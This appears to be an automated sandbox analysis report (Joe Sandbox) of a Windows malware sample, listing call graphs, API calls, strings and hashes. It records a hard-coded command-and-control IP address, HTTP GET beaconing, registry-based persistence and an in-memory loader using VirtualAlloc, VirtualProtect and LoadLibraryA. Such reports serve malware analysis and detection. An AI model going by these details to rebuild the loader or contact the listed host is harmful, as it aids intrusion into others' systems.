__dosmaperr 
31503->31521 31507 412945 31523 4132f1 14 API calls __dosmaperr 31507->31523 31508 412954 31509 412958 31508->31509 31510 41296f 31508->31510 31522 4135e5 6 API calls __dosmaperr 31509->31522 31524 412710 14 API calls __dosmaperr 31510->31524 31514 41296c 31514->31496 31515 41297a 31525 4132f1 14 API calls __dosmaperr 31515->31525 31517->31489 31518->31493 31519->31500 31520->31507 31521->31508 31522->31507 31523->31514 31524->31515 31525->31514 31528 409a20 IsProcessorFeaturePresent 31527->31528 31529 409a1f 31527->31529 31531 409a67 31528->31531 31529->31348 31536 409a2a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 31531->31536 31533 409b4a 31533->31348 31534->31355 31535->31349 31536->31533 31537->31361 31538->31363 31539->31365 31540->31379 31541->31382 31542->31375 31545 409b4c 31543->31545 31546 409b6b 31545->31546 31548 409b6d 31545->31548 31557 40fb4d 31545->31557 31566 4116b2 EnterCriticalSection LeaveCriticalSection __dosmaperr 31545->31566 31546->31387 31549 401560 Concurrency::cancel_current_task 31548->31549 31551 409b77 31548->31551 31564 40af80 RaiseException 31549->31564 31567 40af80 RaiseException 31551->31567 31552 40157c 31565 40ad31 40 API calls 2 library calls 31552->31565 31555 40a589 31556 4015a3 31556->31387 31562 413cb9 __dosmaperr 31557->31562 31558 413cf7 31569 40d0dd 14 API calls __dosmaperr 31558->31569 31560 413ce2 RtlAllocateHeap 31561 413cf5 31560->31561 31560->31562 31561->31545 31562->31558 31562->31560 31568 4116b2 EnterCriticalSection LeaveCriticalSection __dosmaperr 31562->31568 31564->31552 31565->31556 31566->31545 31567->31555 31568->31562 31569->31561 31570->31394 31571->31396 31572->31389 31573->31403 31574->31405 31575->31407 31576->31413 31577->31415 31578->31417 31580 409398 31579->31580 31583 40932a __InternalCxxFrameHandler 31579->31583 31584 4095d0 43 API calls 4 library calls 31580->31584 31582 4093aa 31582->31421 31583->31421 31584->31582 31585->31424 31587 409173 
31586->31587 31588 4092fd 31587->31588 31589 40923d 31587->31589 31593 409178 __InternalCxxFrameHandler 31587->31593 31605 401600 43 API calls 3 library calls 31588->31605 31594 409272 31589->31594 31595 409298 31589->31595 31591 409302 31606 401560 41 API calls 2 library calls 31591->31606 31593->31428 31594->31591 31597 40927d 31594->31597 31602 40928a __InternalCxxFrameHandler 31595->31602 31604 401560 41 API calls 3 library calls 31595->31604 31596 409283 31599 40cfef 39 API calls 31596->31599 31596->31602 31603 401560 41 API calls 3 library calls 31597->31603 31601 40930c 31599->31601 31602->31428 31603->31596 31604->31602 31605->31591 31606->31596 31607 47a7cb9 31610 47a7cc4 31607->31610 31611 47a7cd3 31610->31611 31614 47a8464 31611->31614 31619 47a847f 31614->31619 31615 47a8488 CreateToolhelp32Snapshot 31616 47a84a4 Module32First 31615->31616 31615->31619 31617 47a7cc3 31616->31617 31618 47a84b3 31616->31618 31621 47a8123 31618->31621 31619->31615 31619->31616 31622 47a814e 31621->31622 31623 47a8197 31622->31623 31624 47a815f VirtualAlloc 31622->31624 31623->31623 31624->31623 31625 601ee4 LoadLibraryA 31626 6055ae 31625->31626 31627 603907 31628 605ba6 31627->31628 31629 605bd0 RegOpenKeyA 31628->31629 31630 605bf7 RegOpenKeyA 31628->31630 31629->31630 31631 605bed 31629->31631 31632 605c14 31630->31632 31631->31630 31633 605c58 GetNativeSystemInfo 31632->31633 31634 605c63 31632->31634 31633->31634 31635 704207 31636 7041a3 VirtualProtect 31635->31636 31638 70420e 31635->31638 31636->31638 31639 495003c 31640 4950049 31639->31640 31641 495004c 31639->31641 31655 4950e0f SetErrorMode SetErrorMode 31641->31655 31646 4950265 31647 49502ce VirtualProtect 31646->31647 31649 495030b 31647->31649 31648 4950439 VirtualFree 31653 49504be 31648->31653 31654 49505f4 LoadLibraryA 31648->31654 31649->31648 31650 49504e3 LoadLibraryA 31650->31653 31652 49508c7 31653->31650 31653->31654 31654->31652 31656 4950223 31655->31656 31657 4950d90 31656->31657 31658 4950dad 
31657->31658 31659 4950dbb GetPEB 31658->31659 31660 4950238 VirtualAlloc 31658->31660 31659->31660 31660->31646
                        APIs
                        • GetTempPathA.KERNEL32(00000104,?,B6DBD0D4,75570F00,00000000), ref: 00403DAA
                        • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403F39
                        • Sleep.KERNEL32(000003E8), ref: 00403F42
                        • __Init_thread_footer.LIBCMT ref: 00404517
                        • __Init_thread_footer.LIBCMT ref: 004046DD
                        • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 004048E7
                        • __Init_thread_footer.LIBCMT ref: 00404975
                        • __Init_thread_footer.LIBCMT ref: 00404BDE
                        • CoInitialize.OLE32(00000000), ref: 00404C5F
                        • CoCreateInstance.OLE32(0041F290,00000000,00000001,0041F260,?,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404C7A
                        • __Init_thread_footer.LIBCMT ref: 004050DD
                        • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                        • __Init_thread_footer.LIBCMT ref: 004053EB
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404CE8
                          • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,B6DBD0D4), ref: 00410837
                          • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                        • CoUninitialize.OLE32(?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71,?,?,?,?,00000000,0042D9A0), ref: 00404D21
                        • CoUninitialize.OLE32(?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404DE4
                        • CoUninitialize.OLE32(?,?,?,?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404E65
                        • __Init_thread_footer.LIBCMT ref: 00404046
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                          • Part of subcall function 00402220: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402256
                          • Part of subcall function 00402220: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402277
                          • Part of subcall function 00402220: CloseHandle.KERNEL32(00000000), ref: 0040227E
                        • __Init_thread_footer.LIBCMT ref: 00404222
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Init_thread_footer$CriticalSection$CreateFileUninitialize$EnterLeavePathSleepTime$ByteCharCloseConditionDirectoryFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@VariableWakeWideWrite__ehfuncinfo$??2@
                        • String ID: 185.156.72.65$O@K\$SUB=$Y@BA$ZK\.$get$rmBK
                        • API String ID: 995133137-3578497191
                        • Opcode ID: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                        • Instruction ID: 6a8ba5f9be4b72ae1469cca8882757b6bc7ac7481bdf7cf44a4378d84f27710c
                        • Opcode Fuzzy Hash: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                        • Instruction Fuzzy Hash: 44F2DFB0E042549BDB24DF24DC48B9EBBB0EF45304F5442E9E5097B2D2DB78AA84CF59

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 498 404f70-405085 call 410822 call 4106e2 call 40b570 call 409b8a call 40b570 509 405090-40509b 498->509 510 4050e5-4050ec 509->510 511 40509d-4050b1 call 409cc5 509->511 513 40512d-405150 510->513 514 4050ee-405128 510->514 511->510 518 4050b3-4050e2 call 409fd7 call 409c7b 511->518 515 405153-405158 513->515 514->513 515->515 517 40515a-4051fc call 402760 call 409310 515->517 527 405211-40522c call 401e50 517->527 528 4051fe-405207 call 409a25 517->528 518->510 533 40525d-405285 527->533 534 40522e-40523d 527->534 528->527 535 4052b6-4052b8 533->535 536 405287-405296 533->536 537 405253-40525a call 409b7c 534->537 538 40523f-40524d 534->538 541 4052f0-4052fb Sleep 535->541 542 4052ba-4052cd 535->542 539 405298-4052a6 536->539 540 4052ac-4052b3 call 409b7c 536->540 537->533 538->537 543 4058dd-405982 call 40cfef RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 538->543 539->540 539->543 540->535 541->509 548 4052d0-4052d5 542->548 554 4059b0-4059c8 543->554 555 405984-405990 543->555 548->548 551 4052d7-4052e9 call 4024a0 548->551 551->541 561 4052eb-4052ee 551->561 559 4059f2-405a0a 554->559 560 4059ca-4059d6 554->560 557 405992-4059a0 555->557 558 4059a6-4059ad call 409b7c 555->558 557->558 562 405a42-405a47 call 40cfef 557->562 558->554 566 405a34-405a41 call 409a17 559->566 567 405a0c-405a18 559->567 564 4059e8-4059ef call 409b7c 560->564 565 4059d8-4059e6 560->565 561->541 568 405300-405389 call 40b570 call 409b8a call 40b570 561->568 564->559 565->562 565->564 574 405a2a-405a31 call 409b7c 567->574 575 405a1a-405a28 567->575 586 405390-4053a2 568->586 574->566 575->562 575->574 587 4053f3-4053fa 586->587 588 4053a4-4053b8 call 409cc5 586->588 589 4053fc-4053fe 587->589 590 40540d-405430 587->590 588->587 596 4053ba-4053f0 call 409fd7 call 409c7b 588->596 592 405400-40540b 589->592 593 405433-405438 590->593 592->590 592->592 593->593 595 40543a-4054dc call 402760 call 409310 593->595 605 4054f1-40550c call 401e50 595->605 606 4054de-4054e7 call 409a25 595->606 596->587 611 40553d-405565 605->611 612 40550e-40551d 605->612 606->605 615 405596-405598 611->615 616 405567-405576 611->616 613 405533-40553a call 409b7c 612->613 614 40551f-40552d 612->614 613->611 614->543 614->613 620 405693-40569c 615->620 621 40559e-4055a5 615->621 618 405578-405586 616->618 619 40558c-405593 call 409b7c 616->619 618->543 618->619 619->615 620->586 624 4056a2 620->624 621->620 625 4055ab-4055b3 621->625 627 405775-4057d9 call 409a25 * 3 CoUninitialize call 409a25 * 3 CoUninitialize 624->627 628 4055b9-4055bc 625->628 629 40568d 625->629 657 405807-40580d 627->657 658 4057db-4057e7 627->658 628->629 631 4055c2-4055ea call 40fb4d 628->631 629->620 636 4055f0-405602 call 40aff0 631->636 637 4055ec-4055ee 631->637 639 405605-40565c call 40fb4d call 408c80 call 4035d0 call 402ee0 636->639 637->639 639->629 664 40565e-405669 call 403430 639->664 662 40583b-405853 657->662 663 40580f-40581b 657->663 660 4057e9-4057f7 658->660 661 4057fd-405804 call 409b7c 658->661 660->543 660->661 661->657 665 405855-405861 662->665 666 40587d-405895 662->666 668 405831-405838 call 409b7c 663->668 669 40581d-40582b 663->669 664->629 679 40566b-405679 call 403430 664->679 673 405873-40587a call 409b7c 665->673 674 405863-405871 665->674 675 405897-4058a3 666->675 676 4058bf-4058dc call 409a17 666->676 668->662 669->543 669->668 673->666 674->543 674->673 681 4058b5-4058bc call 409b7c 675->681 682 4058a5-4058b3 675->682 676->543 679->629 690 40567b-40568b call 403430 679->690 681->676 682->543 682->681 690->629 693 4056a7-4056bc 690->693 694 4056c2-4056ef 693->694 696 4056f1-4056fd 694->696 697 405703-405706 694->697 696->697 698 405708-405715 697->698 699 40571b-40571e 697->699 698->699 700 405720-405723 699->700 701 40572d-405730 699->701 702 405732-405734 700->702 703 405725-40572b 700->703 701->702 704 40573b-405762 Sleep 701->704 702->704 705 405736-405739 702->705 703->702 704->694 706 405768 704->706 705->704 707 40576a-40576f Sleep 705->707 706->627 707->627
                        APIs
                          • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,B6DBD0D4), ref: 00410837
                          • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 004050DD
                        • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                        • __Init_thread_footer.LIBCMT ref: 004053EB
                        • Sleep.KERNEL32(000007D0), ref: 00405755
                        • Sleep.KERNEL32(000007D0), ref: 0040576F
                        • CoUninitialize.OLE32(?,?,0042DC19,?,?,?,?,?,?,?,?,?,?,00000000,0042DBDD), ref: 004057A5
                        • CoUninitialize.OLE32(?,?,?,?,?,0042DC19,?,?,?,?,?,?,?), ref: 004057D1
                        • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                        • Sleep.KERNEL32(000003E8), ref: 00405AB0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$CriticalInit_thread_footerSectionTimeUninitialize$CloseCreateEnterFileLeaveOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                        • String ID: 185.156.72.65$185.156.72.65$185.156.72.65$@BAO$SUB=$get$mixone$updateSW$u%
                        • API String ID: 606935701-1501174972
                        • Opcode ID: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                        • Instruction ID: 5b15cd53af07887682d130406d81e99ec93c25d434b47868d83c22c89ba1756f
                        • Opcode Fuzzy Hash: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                        • Instruction Fuzzy Hash: BBD20271D001149BDB18EB24CD49BAEBB75AF01304F5441BEE8097B2D2DB78AE85CF99

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1492 47a8464-47a847d 1493 47a847f-47a8481 1492->1493 1494 47a8488-47a8494 CreateToolhelp32Snapshot 1493->1494 1495 47a8483 1493->1495 1496 47a8496-47a849c 1494->1496 1497 47a84a4-47a84b1 Module32First 1494->1497 1495->1494 1496->1497 1503 47a849e-47a84a2 1496->1503 1498 47a84ba-47a84c2 1497->1498 1499 47a84b3-47a84b4 call 47a8123 1497->1499 1504 47a84b9 1499->1504 1503->1493 1503->1497 1504->1498
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 047A848C
                        • Module32First.KERNEL32(00000000,00000224), ref: 047A84AC
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842703347.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_47a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFirstModule32SnapshotToolhelp32
                        • String ID:
                        • API String ID: 3833638111-0
                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                        • Instruction ID: 5dc7c83e20f23cc8e33816e0c8d348b8f7c13a94c26d9eda38bb56e96fa06e4a
                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                        • Instruction Fuzzy Hash: 8DF09635100711AFE7203FF59C8CB6EB6E8BF89725F110728E642952C0DB74F8554AA2

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1508 4087e0-408807 call 402460 * 2 call 405a50 1514 40880c-408816 call 4106ab 1508->1514
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: mixtwo$nosub
                        • API String ID: 3472027048-187875987
                        • Opcode ID: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                        • Instruction ID: d051705d2d3a1196041d610bae506d61a1e8aa88cf060e84ab2565e50524cdd9
                        • Opcode Fuzzy Hash: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                        • Instruction Fuzzy Hash: AAD05286F0420822C00031BE2E0FA1C3A18064262EFA0122AE820226C3B8882A2489EF
                        APIs
                        • VirtualProtect.KERNEL32(?,0070416D,00000004), ref: 007041E8
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000703000.00000040.00000001.01000000.00000003.sdmp, Offset: 00703000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_703000_file.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: 4c760690aba9c4166c12dedabc6f8366dcbee658cbc4482b9cef41ae9e626e8d
                        • Instruction ID: e26c689e6d203fd96d15a37bcb9031de1892486aa88c12c73133c230c7f0310d
                        • Opcode Fuzzy Hash: 4c760690aba9c4166c12dedabc6f8366dcbee658cbc4482b9cef41ae9e626e8d
                        • Instruction Fuzzy Hash: 1A416DF600C28AFEE705CF2499047FE7BE9EF96330F344619FA418A982D2694C549B25

                        Control-flow Graph

                        APIs
                        • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018A3
                        • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018C9
                        • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018EF
                          • Part of subcall function 004024A0: Concurrency::cancel_current_task.LIBCPMT ref: 004025C9
                        • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401915
                        Strings
                        • text, xrefs: 00401B8F
                        • http://, xrefs: 00401EF4, 004021D3
                        • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004018F3
                        • GET, xrefs: 004020E7
                        • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004018A7
                        • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401862
                        • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004018CD
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                        • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$text
                        • API String ID: 2146599340-4172842843
                        • Opcode ID: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                        • Instruction ID: 7e6d5c8cd7aa1cabae0cdc9af9d1d54ef5f059dc9231cd92a953cd594aab5962
                        • Opcode Fuzzy Hash: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                        • Instruction Fuzzy Hash: 05314371E00109EBEB14DBA9CC95FEEB7B9EB08714FA0812AE511735D0C7789945CBA4

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 728 495003c-4950047 729 495004c-4950263 call 4950a3f call 4950e0f call 4950d90 VirtualAlloc 728->729 730 4950049 728->730 746 4950265-4950289 call 4950a69 729->746 747 495028b-4950292 729->747 733 495004a 730->733 733->733 752 49502ce-49503c2 VirtualProtect call 4950cce call 4950ce7 746->752 749 49502a1-49502b0 747->749 751 49502b2-49502cc 749->751 749->752 751->749 758 49503d1-49503e0 752->758 759 49503e2-4950437 call 4950ce7 758->759 760 4950439-49504b8 VirtualFree 758->760 759->758 761 49505f4-49505fe 760->761 762 49504be-49504cd 760->762 765 4950604-495060d 761->765 766 495077f-4950789 761->766 764 49504d3-49504dd 762->764 764->761 771 49504e3-4950505 LoadLibraryA 764->771 765->766 772 4950613-4950637 765->772 769 49507a6-49507b0 766->769 770 495078b-49507a3 766->770 773 49507b6-49507cb 769->773 774 495086e-49508be LoadLibraryA 769->774 770->769 775 4950517-4950520 771->775 776 4950507-4950515 771->776 777 495063e-4950648 772->777 778 49507d2-49507d5 773->778 781 49508c7-49508f9 774->781 779 4950526-4950547 775->779 776->779 777->766 780 495064e-495065a 777->780 782 4950824-4950833 778->782 783 49507d7-49507e0 778->783 784 495054d-4950550 779->784 780->766 785 4950660-495066a 780->785 786 4950902-495091d 781->786 787 49508fb-4950901 781->787 793 4950839-495083c 782->793 788 49507e4-4950822 783->788 789 49507e2 783->789 790 4950556-495056b 784->790 791 49505e0-49505ef 784->791 792 495067a-4950689 785->792 787->786 788->778 789->782 794 495056d 790->794 795 495056f-495057a 790->795 791->764 796 4950750-495077a 792->796 797 495068f-49506b2 792->797 793->774 798 495083e-4950847 793->798 794->791 800 495057c-4950599 795->800 801 495059b-49505bb 795->801 796->777 802 49506b4-49506ed 797->802 803 49506ef-49506fc 797->803 804 4950849 798->804 805 495084b-495086c 798->805 812 49505bd-49505db 800->812 801->812 802->803 806 49506fe-4950748 803->806 807 495074b 803->807 804->774 805->793 806->807 807->792 812->784
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0495024D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: cess$kernel32.dll
                        • API String ID: 4275171209-1230238691
                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                        • Instruction ID: e66cd634b46ade7cedf94661ff97dd16c42cd12a520f0e41bcf94499f40e58ad
                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                        • Instruction Fuzzy Hash: F2526D74A01229DFDB64CF58C985BACBBB5BF09304F1480E9E94DA7361DB30AA85DF14

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 813 405a50-406330 call 410822 call 4106e2 Sleep call 402760 * 2 call 403ab0 call 408ed0 call 408d80 * 3 call 406c40 call 408920 call 402460 call 408a70 call 402390 call 406ee0 call 4088e0 call 402460 call 408a70 call 402390 861 406404-40642f call 407290 call 4088e0 call 402460 call 408a70 call 402390 813->861 862 406336-4063ad call 406f60 call 4088e0 call 402460 call 4023e0 call 402390 call 406ff0 call 408900 call 402460 call 4023e0 call 402390 call 407070 call 408940 call 402460 call 408a70 call 402390 813->862 884 4064f3-40651e call 407630 call 4088c0 call 402460 call 408a70 call 402390 861->884 885 406435-4064ac call 407310 call 4088e0 call 402460 call 4023e0 call 402390 call 407390 call 408900 call 402460 call 4023e0 call 402390 call 407410 call 408940 call 402460 call 408a70 call 402390 861->885 954 4063cc-4063f7 call 407180 call 408940 call 402460 call 408a70 call 402390 862->954 955 4063af call 407100 862->955 918 406524-4065c1 call 4076b0 call 408920 call 402460 call 4023e0 call 402390 call 407730 call 408900 call 402460 call 4023e0 call 402390 call 4077b0 call 4088c0 call 402460 call 4023e0 call 402390 call 407830 call 4089c0 call 402460 call 408a70 call 402390 884->918 919 406608-406633 call 407a50 call 408890 call 402460 call 408a70 call 402390 884->919 1019 4064b8-4064e3 call 407520 call 408940 call 402460 call 408a70 call 402390 885->1019 1020 4064ae-4064b3 call 4074a0 885->1020 1147 4065c3-4065c8 call 4078c0 918->1147 1148 4065cd-4065f8 call 407940 call 4089c0 call 402460 call 408a70 call 402390 918->1148 962 4066b3-4066de call 407c70 call 408940 call 402460 call 408a70 call 402390 919->962 963 406635-4066ae call 407ae0 call 408900 call 402460 call 4023e0 call 402390 call 407b60 call 408940 call 402460 call 4023e0 call 402390 call 407bf0 call 4088c0 call 402460 call 4023e0 call 402390 919->963 1016 40687d-4069df call 4017a0 call 4083f0 call 408940 call 402460 call 408370 call 408920 call 402460 call 4082d0 call 4089a0 call 402460 call 408da0 call 408e00 call 408eb0 call 408e00 call 408eb0 call 408e00 call 402390 * 8 954->1016 1022 4063fd-406402 call 407210 954->1022 967 4063b4-4063c7 call 408920 call 402460 955->967 1033 4066e0-406759 call 407d00 call 408900 call 402460 call 4023e0 call 402390 call 407d80 call 408920 call 402460 call 4023e0 call 402390 call 407e00 call 4088c0 call 402460 call 4023e0 call 402390 962->1033 1034 40675e-406789 call 407e80 call 408970 call 402460 call 408a70 call 402390 962->1034 963->1016 993 40686f-406878 call 4023e0 call 402390 967->993 993->1016 1251 4069e5-4069fe call 402350 call 4021d0 1016->1251 1019->1016 1091 4064e9-4064ee call 4075b0 1019->1091 1020->967 1022->967 1033->1016 1099 40678b-4067dc call 407f10 call 408900 call 402460 call 4023e0 call 402390 call 407fd0 call 4088c0 call 402460 call 4023e0 call 402390 call 408050 1034->1099 1100 4067de-406809 call 4080d0 call 4088c0 call 402460 call 408a70 call 402390 1034->1100 1091->884 1224 40685c-40686c call 4088c0 call 402460 1099->1224 1100->1016 1167 40680b-406857 call 408150 call 408900 call 402460 call 4023e0 call 402390 call 4081d0 call 408920 call 402460 call 4023e0 call 402390 call 408250 1100->1167 1147->1148 1148->1016 1206 4065fe-406603 call 4079d0 1148->1206 1167->1224 1206->919 1224->993 1256 406a00-406a23 call 402210 call 402460 call 4025e0 1251->1256 1257 406a3e-406a45 Sleep 1251->1257 1256->1257 1264 406a47-406a9c call 402390 call 408c80 * 3 call 404f70 1256->1264 1257->1251
                        APIs
                          • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,B6DBD0D4), ref: 00410837
                          • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                        • Sleep.KERNEL32(000003E8), ref: 00405AB0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID: 185.156.72.65$185.156.72.65$SUB=$get$u%
                        • API String ID: 2563648476-311857291
                        • Opcode ID: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                        • Instruction ID: 73809eb16a5d3869ae15fb7337a890a5b139b8f1a0f0395b135ebc5315de088a
                        • Opcode Fuzzy Hash: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                        • Instruction Fuzzy Hash: 03326571D001189ACB19FB76C95AAEE73785F14308F10817FF846771D2EE7C6A48CAA9

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1274 401e50-401e9e 1275 401ea0-401ea5 1274->1275 1275->1275 1276 401ea7-402179 call 402760 * 2 call 40aff0 call 40d0f0 InternetOpenA 1275->1276 1289 4021a3-4021c0 call 409a17 1276->1289 1290 40217b-402187 1276->1290 1292 402199-4021a0 call 409b7c 1290->1292 1293 402189-402197 1290->1293 1292->1289 1293->1292 1294 4021c8-4021f9 call 40cfef call 401e50 1293->1294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: http://
                        • API String ID: 0-1121587658
                        • Opcode ID: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                        • Instruction ID: 283a115399ec50033446259c01340d37f537f7c1e1c45d518ea9d7f2bb9a556a
